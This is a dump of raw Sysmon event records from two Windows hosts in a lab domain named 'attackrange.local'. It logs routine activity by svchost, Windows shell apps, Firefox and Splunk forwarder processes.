10341000x8000000000000000441603Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.275{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441602Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.275{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441626Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:47.668{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62434-false10.0.1.12-8000- 23542300x8000000000000000441625Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.602{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D8850A697E7B68776D1F6C6289CBE5,SHA256=F1B59794DDA22685B3F8090A2E2DC54E50653FA8CA240A92BE40E0F4A364537F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293305Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:50.928{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCE7F11F7A612AD79B379F6CBB9F9FC2,SHA256=468E33B152AD844A986F11A99CDCA02CFAE6D15728AF23ED46CE1032A31505D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293304Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:50.679{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=E4B06684074637DE45FEE5ABF8A1B1C3,SHA256=1FD96B14AE8E019265FFEACBA9F250C6FD23CB80677CF07728F05B65CF7CC349,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293303Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:50.679{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=88324C68FF0880A6C99FF29B9C208ECC,SHA256=B549769FB1A5A6C613489AA01DE922140B78AD0619CC83E17DFA798B31DF3F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293302Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:50.679{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=ABE98A4EE2AA0C7B48EE55A5F9E89EE0,SHA256=567EDEF67A52484E15BFE2C8874AC8E7E9CF80B091764125270215D9C3E63983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293301Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:50.679{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=0E3CC109FBFB79E203CF1D81F4FF0A16,SHA256=A23F1C5951EE27F8CE59EDA6EF4DDF69187269FE203F01C6DA4D7890CA093C7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293300Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:50.679{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=11F45A04536121BA3F2832A4CB90BC6C,SHA256=74DECF8D45B364E7C7C4B7922A64739A6116F20A0A7E5E18C2716283021C8BDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293299Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:50.679{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=4A244335999DE0335D0E223638B1B148,SHA256=5EF99278E88F30E7393A27903F43013DC1ACC83C1866398CB2BCA3592DE3CB55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441624Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.276{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441623Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.276{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441622Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.117{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-02CE-6088-D828-00000000BA01}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441621Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.115{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441620Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.115{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441619Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.115{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441618Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.114{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441617Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.114{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-02CE-6088-D828-00000000BA01}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441616Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.114{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-02CE-6088-D828-00000000BA01}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441615Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:50.113{42DC5269-02CE-6088-D828-00000000BA01}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293306Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:51.961{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5450ABB701277AA21098D264CAD53F54,SHA256=12F5565C3C28A0401FCB243C2CCEC5FE2AB494DBAB28958A9F8F3AC8D494CC37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441630Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:51.695{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59C07A2D721269141509997986A65385,SHA256=57936C413F4F54676BA2B41CD98181E40DC497A072EEF2F2F557B44686F4D0E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441629Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:51.277{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441628Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:51.277{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441627Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:51.121{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED9B64B5B8182F35B28C9E38D597AB10,SHA256=B50006DB644E67D4727F55E33CAEDB1F1F6D84D85379125DCB1F752C51065AEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293307Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:52.975{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCE47C09367E50D9BB8161257E9C45B,SHA256=E2B495B38C9A4117707AD8D5552E6E547795F1E6E80C7884FF4225C7A1C90D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441633Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:52.928{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F85E4589A6889B8061562816DE85A65A,SHA256=631B777A45489335DC8CEF240DF4468650BB750FDDF40F61459360DE2B42715A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441632Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:52.278{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441631Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:52.278{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441667Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441666Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441665Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441664Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441663Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441662Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441661Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 